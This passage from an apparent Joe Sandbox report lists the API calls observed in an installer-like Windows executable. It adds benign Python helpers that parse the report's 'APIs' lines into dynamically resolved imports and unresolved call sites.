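        module = dlls[0] if dlls else None
        for api, _lib, args, ref in CALL_RE.findall(entry):
            if api != "GetProcAddress":
                continue
            argv = [a.strip() for a in args.split(",")]
            symbol = argv[1] if len(argv) > 1 else None
            # A real GetProcAddress name is a plain C identifier; anything
            # else ("user32.dll", "?") means the second argument shown is not
            # the one the call actually received, so it is flagged, not trusted.
            suspect = symbol is None or re.fullmatch(r"[A-Za-z_]\w*", symbol) is None
            records.append({"ref": ref, "module": module, "symbol": symbol, "suspect": suspect})
    return records


def summarize_by_module(records):
    """Map DLL name -> sorted list of trusted symbols resolved from it."""
    by_module = defaultdict(set)
    for r in records:
        if not r["suspect"]:
            by_module[r["module"]].add(r["symbol"])
    return {m: sorted(s) for m, s in by_module.items()}


if __name__ == "__main__":
    recs = extract_dynamic_imports(SAMPLE_REPORT)
    for r in recs:
        flag = "  (suspect args)" if r["suspect"] else ""
        print(f"{r['ref']}  {r['module'] or '<unnamed>':<12} {r['symbol']}{flag}")
    print(summarize_by_module(recs))
```

The BZ2 entry comes out with no DLL because nothing in that entry names one: the handle 022E0000 was loaded elsewhere, so the module has to be recovered from the LoadLibrary call in whichever function produced that handle, or from the dropped-file list. Treat the per-module table as a starting point for the "hidden imports" question, not as a complete reconstruction of the import set.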

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0048FAFA,QueryCancelAutoPlay,004929A3), ref: 0042E76A
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
                                                                            • InterlockedExchange.KERNEL32(00494660,00000001), ref: 0042E781
                                                                            • ChangeWindowMessageFilter.USER32(0000C1B5,00000001), ref: 0042E792
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressChangeExchangeFilterHandleInterlockedMessageModuleProcWindow
                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                            • API String ID: 1365377179-2498399450
                                                                            • Opcode ID: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
                                                                            • Instruction ID: 4a434d6ebf99a211ad985c76b6619d27f745a5091495b81aefed992397c45a81
                                                                            • Opcode Fuzzy Hash: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
                                                                            • Instruction Fuzzy Hash: 7BE0ECE1741310EAEAA0BBA2FC8AF5A399497E5719F50003BF104651E2C6BD0C41C91C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                            • API String ID: 667068680-222143506
                                                                            • Opcode ID: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                            • Instruction ID: dcc6af067bf3078790d87b20fbc0612a0ccff274e7f94df7ba8b603e8e0053f1
                                                                            • Opcode Fuzzy Hash: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                            • Instruction Fuzzy Hash: 89C012F0241700EDDA10AFF15CC2D7A2148E540B2A720817BF448791C7D67C6E055A1D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
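The two function blocks above (the user32!ChangeWindowMessageFilter lookup at 0042E76A-0042E792 and the kernel32!VerSetConditionMask / VerifyVersionInfoW lookup at 00473B76-00473B93) are the report's way of showing imports resolved at run time through GetModuleHandleA + GetProcAddress, which is why they never appear in the static import table. When triaging a long report like this one it helps to turn the "APIs" lines back into a list of (DLL, export, call site) tuples and to flag the calls the sandbox could not name at all (the bare-address entries such as 73A0A570.USER32 in the blocks that follow). The parser below is an added example written for this page, not Joe Sandbox code; the sample input is constructed from the "APIs" lines printed above, and the pairing rule (a GetProcAddress inherits the DLL from the most recent GetModuleHandle/LoadLibrary line) is an assumption of the example, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: "APIs" lines copied verbatim from the function blocks in this report.
SAMPLE_APIS = """\
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0048FAFA,QueryCancelAutoPlay,004929A3), ref: 0042E76A
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
• InterlockedExchange.KERNEL32(00494660,00000001), ref: 0042E781
• ChangeWindowMessageFilter.USER32(0000C1B5,00000001), ref: 0042E792
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
• GetFocus.USER32 ref: 0041B6B5
• 73A0A570.USER32(?), ref: 0041B6C1
  • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
"""

# One report line: optional sub-call prefix, Name.MODULE, optional (args), "ref: <addr>".
LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]{8}):\s*)?
        (?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

RESOLVERS = ("GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int] = None

    @property
    def unresolved(self) -> bool:
        # Joe Sandbox prints the raw import address as the name when it could
        # not map the call to an export (e.g. "73A0A570.USER32").
        return HEX32_RE.match(self.name) is not None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of an "APIs" section; headings and junk are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a != ""]
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def resolved_exports(calls: List[ApiCall]) -> List[Tuple[str, str, int]]:
    """Pair each GetProcAddress with the DLL named by the most recent
    GetModuleHandle/LoadLibrary (assumption of this example). The export is the
    second argument unless it is '?' or a raw hex value. The sandbox recovers
    arguments heuristically, so a DLL name can land in the export slot (the
    first block above shows 'user32.dll'); it is reported as-is for the analyst
    to cross-check against the direct call that follows (ChangeWindowMessageFilter)."""
    out: List[Tuple[str, str, int]] = []
    current_dll: Optional[str] = None
    for c in calls:
        if c.name in RESOLVERS and c.args and c.args[0].lower().endswith(".dll"):
            current_dll = c.args[0].lower()
        elif c.name == "GetProcAddress" and len(c.args) >= 2:
            export = c.args[1]
            if export != "?" and not HEX32_RE.match(export):
                out.append((current_dll or "<unknown>", export, c.ref))
    return out


def unresolved_calls(calls: List[ApiCall]) -> List[Tuple[str, str, int]]:
    """Calls the sandbox could only name by address; worth resolving by hand in IDA."""
    return [(c.name, c.module, c.ref) for c in calls if c.unresolved]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_APIS)
    for dll, export, ref in resolved_exports(parsed):
        print(f"{ref:08X}  GetProcAddress  {dll}!{export}")
    for name, module, ref in unresolved_calls(parsed):
        print(f"{ref:08X}  unresolved      {module}!{name}")
```

Run against the full report text rather than the sample, the export list gives a quick picture of which APIs the sample hides from static import analysis (version checks, message-filter changes, oleacc.dll accessibility calls), and the unresolved list tells you which call sites still need manual resolution against the loaded user32/gdi32 image base.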

                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B6B5
                                                                            • 73A0A570.USER32(?), ref: 0041B6C1
                                                                            • 73A08830.GDI32(00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B6F6
                                                                            • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B702
                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B730
                                                                            • 73A08830.GDI32(00000000,00000000,00000000,0041B771,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B764
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A08830$A022A16310A570Focus
                                                                            • String ID:
                                                                            • API String ID: 3731147114-0
                                                                            • Opcode ID: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
                                                                            • Instruction ID: 06dd750ffd38faa4806619bbf82afcbb6c92213719a6bc319da55d16d67b79f4
                                                                            • Opcode Fuzzy Hash: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
                                                                            • Instruction Fuzzy Hash: 8E512C70A00609AFDF11DFA9C895AEEBBB8FF49704F104466F510A7390D7789981CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B987
                                                                            • 73A0A570.USER32(?), ref: 0041B993
                                                                            • 73A08830.GDI32(00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9CD
                                                                            • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9D9
                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041B9FD
                                                                            • 73A08830.GDI32(00000000,00000000,00000000,0041BA3E,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041BA31
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A08830$A022A16310A570Focus
                                                                            • String ID:
                                                                            • API String ID: 3731147114-0
                                                                            • Opcode ID: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
                                                                            • Instruction ID: 49b1e422d63778e1935042bf56866254f806bc58ba08b8974fd4ee1451f7b7cb
                                                                            • Opcode Fuzzy Hash: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
                                                                            • Instruction Fuzzy Hash: 4F512B74A006089FCB11DFA9C895AAEBBF9FF48700F118066F904EB750D7389D40CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B4EE
                                                                            • 73A0A570.USER32(?,00000000,0041B5C8,?,?,?,?), ref: 0041B4FA
                                                                            • 73A14620.GDI32(?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B516
                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B533
                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8), ref: 0041B54A
                                                                            • 73A0A480.USER32(?,?,0041B5A3,?,?), ref: 0041B596
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: E680$A14620A480A570Focus
                                                                            • String ID:
                                                                            • API String ID: 932946509-0
                                                                            • Opcode ID: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
                                                                            • Instruction ID: a6e4b16520c9e4bc630ca31e265eea6a5194191570467489af8bdb357d288b52
                                                                            • Opcode Fuzzy Hash: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
                                                                            • Instruction Fuzzy Hash: 2D41C571A04254AFDF10DFA9C885AAFBBB5EF49704F1484AAE900E7351D2389D10CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045B4A8,?,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B41A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                            • API String ID: 1452528299-1580325520
                                                                            • Opcode ID: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
                                                                            • Instruction ID: 700096bd68f309f90710c381aa7dde6ba0fdda2f7fc45a32d8085176b984ac24
                                                                            • Opcode Fuzzy Hash: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
                                                                            • Instruction Fuzzy Hash: F911BB35204204AFD721DAA5C981B6E779DDB49306F708077BD0166383D77C9F0A95AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BD45
                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BD4F
                                                                            • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD59
                                                                            • 73A14620.GDI32(00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD80
                                                                            • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD8D
                                                                            • 73A0A480.USER32(00000000,00000000,0041BDD3,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A14620MetricsSystem$A480A570
                                                                            • String ID:
                                                                            • API String ID: 1130675633-0
                                                                            • Opcode ID: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                            • Instruction ID: 8181195c8b7ace5e518c23098daf85fccaa127339f370ed271397b7e8efdaee2
                                                                            • Opcode Fuzzy Hash: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                            • Instruction Fuzzy Hash: 1F212C74E046499FEB04EFA9C941BEEB7B4EB48714F10402AF514B7680D7785940CFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00478D66
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,004687F2), ref: 00478D8C
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00478D9C
                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00478DBD
                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00478DD1
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00478DED
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$Show
                                                                            • String ID:
                                                                            • API String ID: 3609083571-0
                                                                            • Opcode ID: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
                                                                            • Instruction ID: 849554ad505ceeff35d37c7ff58508bf2e1726df1cd7e8e141310fbeec4833cd
                                                                            • Opcode Fuzzy Hash: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
                                                                            • Instruction Fuzzy Hash: 20014CB1681210ABD610D768CD85F663798AB5E331F06436AB558DB3E3CA3DDC009B08
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B1EC
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B1FE
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B221
                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B22C
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B247
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B252
                                                                              • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                            • String ID:
                                                                            • API String ID: 3527656728-0
                                                                            • Opcode ID: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                            • Instruction ID: 2be34f36c4bf399c8fa5e8a938e63ded300dcfd20fe04f8c9e05bbd916d2a40e
                                                                            • Opcode Fuzzy Hash: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                            • Instruction Fuzzy Hash: 84F0BFB1511101ABCE00FFBAD9CAE4B27A89F443097048057B944DF19BC63CDC504B3E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00471F9E
                                                                            • 73A159E0.USER32(00000000,000000FC,00471EFC,00000000,0047212E,?,00000000,00472153), ref: 00471FC5
                                                                            • GetACP.KERNEL32(00000000,0047212E,?,00000000,00472153), ref: 00472002
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00472048
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A159ClassInfoMessageSend
                                                                            • String ID: COMBOBOX
                                                                            • API String ID: 3375322265-1136563877
                                                                            • Opcode ID: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
                                                                            • Instruction ID: 8d6e69cdc7b25736ecace23fa1d294beb101704f1944a8432741b73acccf4278
                                                                            • Opcode Fuzzy Hash: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
                                                                            • Instruction Fuzzy Hash: 1D513E34A002459FCB10DF69D985A9DB7F5FB49304F51C0BAE908AB762C778AD41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle
                                                                            • String ID: .tmp$AI$_iu
                                                                            • API String ID: 3498533004-3125386451
                                                                            • Opcode ID: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
                                                                            • Instruction ID: 46d0d6ad35c06494b98f164fbe74fb59b710500a089b477c7385efe511c505c8
                                                                            • Opcode Fuzzy Hash: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
                                                                            • Instruction Fuzzy Hash: 6F31B370A00219ABCB11EBA5C942B9EB7B5AF45309F20447BFD00B73C2D6785F0587AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • ShowWindow.USER32(?,00000005,00000000,00491E79,?,?,00000000), ref: 00491C4A
                                                                              • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                              • Part of subcall function 00407210: SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
                                                                              • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                            • API String ID: 3312786188-1660910688
                                                                            • Opcode ID: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                            • Instruction ID: 53767b7cbe00aacee5155422e2e832e8fb1e8c52b774a8ea4378669dcc18a7ad
                                                                            • Opcode Fuzzy Hash: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                            • Instruction Fuzzy Hash: 6B31C574A006059FCB11EF65CC52D5E7BB5FB85304F60857AF800AB7A1DB78AD00CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID: ,#v
                                                                            • API String ID: 730355536-3386492414
                                                                            • Opcode ID: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                            • Instruction ID: aa962e87e2017aa174224405feb2f066e475dbd7097569f409cdfcf28ecb4bd2
                                                                            • Opcode Fuzzy Hash: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                            • Instruction Fuzzy Hash: E401AD706442405EEB19AB69E812F253ED4D7D574CF11843BF540A6AF1C67C4843CB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
